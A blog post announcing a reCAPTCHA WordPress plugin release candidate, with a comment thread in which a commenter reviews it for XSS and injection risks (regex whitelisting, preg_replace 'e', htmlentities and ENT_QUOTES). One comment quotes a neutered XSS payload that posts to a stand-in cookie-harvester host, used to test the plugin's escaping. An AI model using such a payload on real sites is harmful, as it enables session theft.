reCAPTCHA WordPress Plugin 2.8 Release Candidate 2

Alright after a few suggestions, I have fixed up the plugin. I’ve added options to enable SSL, be compliant with XHTML 1.0 Strict, the ability to change the theme for the registration form recaptcha, and the ability to not show the recaptcha on comment posts (In case you only want it to show on the registration form and only allow registered users to comment). I’ve also fixed a few bugs. I’ve also kind of redesigned the options page, only a little. I’ve separated some options so that users have an easier time understanding the context of all of them. Here is what it looks like now:

New Settings Page

You can download the reCAPTCHA WordPress Plugin version 2.8 Release Candidate 2 here.

13 Responses to “reCAPTCHA WordPress Plugin 2.8 Release Candidate 2”


  1. Hi. Thanks for the update; I tried out the new release candidate as you suggested.

    If you make the usage of api-secure a checkbox, that’ll turn it on or off globally, which breaks when only some of the pages are protected — i.e., the login and registration (everything under wp-admin) but not the blog posts and comment pages, which is how I have mine set up.

    Auto-detecting whether we need to use api-secure or api (like my patch did) should work reliably in every case I can think of. Why require an option if we can make it Just Work™? It’s pretty straightforward and reliable, really.

    One blocker: There’s a typo in the embedded stylesheet, after the closing tag that puts a semicolon at the top of every page when the plugin’s enabled. End of line 45 of recaptcha.php, you don’t want a semicolon there. View source on the resulting page (or heck, just look at the top line, which now consists of a lonely semicolon) and you’ll see why.

    Thanks for working on this. reCaptcha is the best CAPTCHA I’ve used anywhere, and, given recent research, almost the only unbroken one left. It’s great to be able to just plug it in and have it work.

  2. Thanks I just realized what you mean about only some things being protected. It seems like your patch only edits the recaptcha plugin file which is a good thing since we don’t want to use server globals in the library. I will implement your method instead.

    Thanks for the heads up. Someone on the WordPress forums told me about the semicolon, I’ve fixed it.

    EDIT: I’ve fixed those two problems. I’ve uploaded it and you could download Release Candidate 3 here. Please try it out and let me know if it works with the whole SSL thing; I implemented your fix (I hope I didn’t miss anything).

    Also thanks for the feedback, it’s very much appreciated and I’m glad you like it. I too share your ideas over reCAPTCHA and so my goals are to perfect the plugin. Thanks again, I really appreciate your help Myoukochou!

  3. You’re more than welcome.

    Tested RC3; it’s good. All the bits I’m using (as in, not mailhide), work fine. Thanks!

    As for the concerns expressed on the group about Mailhide and XSS — I do know what I’m doing in that area, but it’s too early in the morning for me to look for XSS vulns. I haven’t had breakfast yet, so auditing PHP regexps is a rude awakening. :)

    Check the regexps in mh_insert_email. You should be whitelisting known valid characters, never blacklisting potentially-troublesome ones (there’s too many, and too much potential for havoc), so the [^@"]+ atoms may need swapping for one that looks for anything but (broadly) [a-z0-9-_.+]. Get the idea? Watch that user input like a hawk.

    \w varies according to locale, so you might want to steer clear of it.

    RFC 2822-compliant email addresses can include angle brackets, apostrophes, and ampersands in the local-part — but you don’t want them to. Now, \w shouldn’t match those characters, but “shouldn’t” and “\w” occasionally disagree, and if they do, it turns out to be a hellish bug to track down because, for example, it might depend on an arabic or kanji locale, where \w might well include high Unicode.

    Whether anything might be exploitable practically I’m not sure. Anything malicious you inserted would be AES-encrypted in the mailhide URL, thus mangled beyond “usefulness” on the page itself; if mailhide.recaptcha.net is suitably cautious about not returning troublesome characters, it wouldn’t present a problem in practice.

    Plus, it’s popping up to another domain; even if you did insert a script into the output, what are you going to do there? Steal the clicker’s mailhide.recaptcha.com cookie? That’s… not a whole lot of use. A lot of XSS vulnerabilities are useless to an attacker in practice. Security researchers tend to just stop after inserting an script alert, rather than look at how they can leverage the arbitary code to do something interesting — if there’s one there, that might be a pretty dull one.

    However, like I said, I just got up. I don’t trust myself to do a PHP security audit before my first cup of tea. :) I’m simply keeping mailhide off for now.

  4. Blaenk Denum wrote:

    Whether anything might be exploitable practically I’m not sure. Anything malicious you inserted would be AES-encrypted in the mailhide URL, thus mangled beyond “usefulness” on the page itself; if mailhide.recaptcha.net is suitably cautious about not returning troublesome characters, it wouldn’t present a problem in practice.

    Very true, I can’t believe I didn’t realize that!

    Alright, take your time man you don’t know how much I appreciate your feedback and support! Thanks for the explanation on the regular expressions, I will try and look into it based on what you said but honestly I’m sure you’re an expert if not way better than me at this and so I would trust you more with this if you don’t mind (After you’ve had your cup of tea, in fact, whenever you like :P ). I always give credit where credit’s due so it won’t be in vain!

    Thanks again Myoukochou I really appreciate your support!

  5. Here is RC4.

  6. Release Candidate 4 works fine.

    I’ve done a little security stuff here and there, yeah… and don’t worry about credit. I’m just in it to get a working, spammer-resistant CAPTCHA for my new blog; I gave up caring about credit for bugfixing over a decade ago. :)

    The default functions seem to be secure, but I’m reluctant to say that about Mailhide for the moment.

    reCaptcha-2.8-RC4 has, however, survived my (patent-pending) One-Kit-Kat Security Audit™ intact, albeit with recommendations. ;)

    Just throwing
    [noh_de]l33t.xss.k1dd13@{script}var x=window.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject(’MSXML2.XMLHTTP.3.0′);x.open(’POST’,'http://malware.example.com/have_you_ever_been_to_a_session_cookie_harvester_before.php’,true);{/script}haha.lolpwned.com[/noh_de] (neutered for safety - imagine curly brackets as angle brackets) at it will not work; htmlentities will eat the angle brackets. That’s all that’s between you and XSS, but it’s enough… but at least one modification would be advisable.

    (Yes, that is what real XSS attacks tend to look like. Only, in the wild, with more l33t, more .cn or .info, and less example.com.)

    I’ve given the rest of the code a bit of a once-over, and I would make the following observations:


    First off, there’s PHP’s very own unguarded rocket-powered chainsaw - a preg_replace ‘e’ - in there (recaptcha.php, line 373). Oh my.

    Is there a particular reason you didn’t just use the PHP function rawurlencode() instead of that? (i.e., am I missing something, for example, regarding UTF-8 extended characters in comments that wouldn’t come back right if you used rawurlencode()?)

    In this particular case, with the particular pattern there, you appear to have got away with the preg_replace ‘e’. Phew. I’d recommend replacing it with something safer anyway, if you possibly can. (preg_replace_callback is actually faster, not to mention safer, because it doesn’t have to generate fresh code on every match.)

    Please be extremely careful with those things; they’re very slow, and they execute code directly including matched fields interpolated from user-supplied data - so they’re incredibly dangerous, and in most cases the worst way of doing a particular task.

    I can’t help but think that whoever was responsible for preg_replace ‘e’ probably laughs maniacally every time a new PHP injection flaw is published, before quaffing a pint of virgin blood to refresh themselves before sitting down on their throne of evil to play the pipe organ in menacing minor chords while stroking their fluffy white cat. (Mroo~w.)

    Ahem.


    Secondly: I’d prefer a tighter email matching regexp; as I said - I generally recommend using positive matches, not negative ones. In these particular cases, it gets passed to mh_replace_hyperlink or mh_replace, and recaptcha_mailhide_url or recaptcha_mailhide_html eats it and spits it out as encrypted base64.

    The trouble with negative matches is that you can put literally anything but what you’re expecting in there, and it’ll eat it right up. Anything. HTML entities, partial HTML entities, single quotes, double quotes, angle brackets, parentheses, at-signs, semicolons… all the way up to exotic overlong UTF-8 sequences that sane parsers should reject out of hand, but frequently don’t.

    Thought experiment: Ever seen an email address that doesn’t match this?
    /([a-z0-9-_.+]+@[a-z0-9][a-z0-9-_.]{0,253}[a-z0-9]\.[a-z]{2,6})/i
    (…other than bang paths; but no-one in 2008 is going to spam a bang path.)

    Note in particular: I’m not saying what tokens end the match, I’m saying what tokens continue it, so that we know what we’re getting doesn’t have any funny business piggy-backing onto it. Paranoid? Well, yes.

    That doesn’t address if you can do anything malicious with messing around with these, of course. Depending on the code path, it might be perfectly OK.


    Which brings me to the final point:

    Most of your XSS defense is htmlentities(). Fine, you’d think… but of course, this is PHP, it can’t be that easy - so as usual, there’s a hidden gotcha.

    htmlentities doesn’t encode single quotes. You want htmlentities($input_string,ENT_QUOTES) to get single quotes as well. You probably want to be using that pretty much everywhere you’re using htmlentities now, unless you have a specific reason you need the single quotes as-is. In recaptchalib.php, as well.

    Experiment with that, because I think that’s the only possible practical problem in there, unless mailhide.recaptcha.net has some bizarre HTML injection flaw (and that’s not really within our scope).

  7. Haha. Wow thanks for the very thorough response, I really appreciate it.

    Blaenk Denum wrote:

    First off, there’s PHP’s very own unguarded rocket-powered chainsaw - a preg_replace ‘e’ - in there (recaptcha.php, line 373). Oh my.

    Is there a particular reason you didn’t just use the PHP function rawurlencode() instead of that? (i.e., am I missing something, for example, regarding UTF-8 extended characters in comments that wouldn’t come back right if you used rawurlencode()?)

    I’m actually the new developer for this plugin. For versions prior to the one I’m working on there were other authors (There still are they just haven’t worked on it in the longest time). That was one of the pieces that I didn’t write. So you think I should just do:

    1
    
    var _recaptcha_wordpress_savedcomment =  rawurlencode($comment->comment_content);

    Or do you mean I should use a preg_replace_callback and make it so that when that pattern is met, do a rawurlencode on the entire match?

    You would like me to use that email regex instead?

    /([a-z0-9-_.+]+@[a-z0-9][a-z0-9-_.]{0,253}[a-z0-9]\\.[a-z]{2,6})/i

    I used to have a huge one but it seemed like overkill:


    /[a-z0-9!#$%&'*+\/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+\/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i

    The reason I’m using negative look aheads and look behinds is because I needed a way to only get matches that weren’t within nohide tags, if that’s what you’re referring to. Took forever to eventually get the regular expressions correct. But if you have ones you would like me to use instead I’m all for it :D
    I replaced all my calls to htmlentities and included the ENT_QUOTES argument. This was only in recaptchalib.php recaptcha_mailhide_html and recaptcha.php mh_replace_hyperlink.

  8. Myoukochou, seeing as how you are apparently way more knowledgeable than me in this area, I am wondering if you could please help me out and do the changes yourself and then paste the result(s) or something. Of course this can be whenever you have time, there’s no pressure at all. From what you mentioned it seems like they are minor changes, but I would rather be safe than sorry (This is a popular plugin and I wouldn’t want many sites at risk for a stupid mistake, although you already mentioned it is relatively safe). If you have any questions as to the understanding of the code, please ask me and I will explain it to you. If you would rather communicate through email, hit me up at jorg@gmail.com

    I would really appreciate this. Right now I’m nearing the end of the year at school and I have many projects and tests to work on especially some due tomorrow so I will not have time to work on it today. In fact I should begin working on my Architecture projects right now. Again, Myoukochou, I would really appreciate any help you could provide and already greatly appreciate the help you have provided so far.

    By the way, my response above might seem brief compared to your thorough response, making you think it was in vain. But I actually did read it all, and again I appreciate the thorough response, it’s just that I don’t have time to work on it right now like I already mentioned, and some things you mentioned are honestly too advanced for me.

    Thanks again Myoukochou.

  9. Ah. I didn’t realise you’re a student. Go do tests, they’re more important — trust me. :)

    None of it really represents a problem. For safety’s sake, put the ENT_QUOTES — and yes, those are the only occurrences (lines 287-288, recaptchalib.php, and line 201, recaptcha.php).

    Not to mention that given the context of the call, all you’d be worried about is being able to inject stuff into your own comment reply page when failing a captcha. Not normally a big deal.

    Those were mainly recommendations for the future, though. :)

    Characters in the range U+0000..U+000F might also be incorrectly converted to %0-%F by that code, by the way, which Javascript’s unescape() doesn’t seem to want to know. I’ll try rawurlencode() as that appears to do the right thing, but needs testing with a bit of extended UTF-8.

    In other news, I have an inexplicable craving for corned beef hash, and I don’t know why.

  10. Not a security issue, but an actual bug, but one I’m not sure how to fix easily:

    Looks like rawurlencode’s behaviour is undefined if fed UTF-8. Big yay for the web development language that doesn’t actually support UTF-8 until PHP 6. :)

    Also looks like IE’s Javascript parser detests newlines and tabs in strings. (Mozilla’s doesn’t mind.) UTF-8 is also apparently a problem in some cases there.

    From a user perspective, looks like if you have something like a tab or some high-ascii (for example, 冥胡蝶) in your comment, if you get the captcha wrong, you might not get your comment back when it reloads the page because the… javascript unescape function chokes on the UTF-8?

    But if you encode the utf-8 bytes, javascript will insert them as characters. I’m not sure there’s any winning this one. Grr.

    Just make those ENT_QUOTES insertions, and I’ll stick a fork in it and call it done for now. :)

  11. The rawurlencode and UTF-8 problem is known, which was why I changed it to use a preg_replace instead.

    I’ve already done the ENT_QUOTES fix. One guy at the WordPress Forums is claiming that people are still able to sign up at his blog without even having to fill in the CAPTCHA field. This is really weird especially since, after some tests, it hasn’t seemed to happen to me and I haven’t heard anyone else complaining about it. Can you test it yourself on your install and see if the same thing happens? It could be that he enabled XHTML compliance and has Javascript disabled on his browser based on the screenshots he provided but I am not entirely sure.

  12. *nods* In that case, I understand; that particular preg_replace is OK, definitely fine to go live, like you have. :)

  13. Thanks for all the help Myoukochou, I really appreciate it! If you ever need or want me to do something to the plugin just let me know!

Leave a Reply